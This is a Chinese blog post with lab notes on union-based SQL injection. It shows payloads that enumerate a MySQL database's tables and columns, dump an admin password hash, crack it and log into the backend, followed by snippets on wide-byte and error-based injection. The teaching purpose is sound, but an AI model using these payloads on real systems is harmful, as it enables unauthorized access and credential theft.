SQL注入

2022-07-22 19:18:12 字數 1834 閱讀 2278

登入10.6.1.54,任意點取乙個新聞的鏈結( 後面加

#,返回正常說明是

order by 18-- 資料庫有

18個表(/*從

1開始試,取

19時報錯新聞內容消失,此時證明有它的資料庫有

18個表)

*aid號

79前加上「

-」號才能顯示,(「

-」的作用相當於

1=2,即條件為假)

聯合查詢,判斷回顯資料位置

/*檢視資料庫名(user()檢視使用者、

version

()檢視版本資訊)

union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=資料庫名字(用

16進製表示)

--   /*檢視表名

union select 1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.tables where table_schema=資料庫名字(用

16進製表示)

limit 1,1--

/*檢視欄位名

limit 2,1 3,1...檢視其他欄位名

union select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from information_schema.columns where table_name=表名

(用16進製表示

)- /*檢視列名

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,pwd,15,16,17,18 from ym_admin--  /*爆管理員賬戶密碼

得到md5加密的密碼

b7a782741f667201b54880c925faec4b

解密得到密碼10000

登入後台

輸入密碼成功登入

SQL注入(三) sql注入 bugku

原理 mysql 在使用 gbk 編碼的時候,會認為兩個字元為乙個漢字,例如 aa 5c 就是乙個 漢字 前乙個 ascii碼大於 128 才能到漢字的範圍 我們在過濾 的時候,往往利用的思 路是將 轉換為 換的函式或者思路會在每一關遇到的時候介紹 因此我們在此想辦法將 前面新增的 除掉,一般有兩種...

SQL注入 報錯注入

乙個帶get引數的 並且不從資料庫返回資料,但存在報錯資訊 檢視字段情況 報錯注入語句格式 and 1 2 union select1,2,3 from select count concat floor rand 0 2 sql語句 a from information schema.tables...

SQL注入 報錯注入

sql注入基礎 盲注 用於注入結果無回顯但錯誤資訊有輸出的情況 floor函式 返回小於等於某值的整數,例如floor 1 則返回1,floor 1.9 也返回1 rand函式 生成隨機數.可指定seed,指定後每次生成的數都一樣即偽隨機,不指定seed則每次生成的隨機數都不一樣.通過floor和r...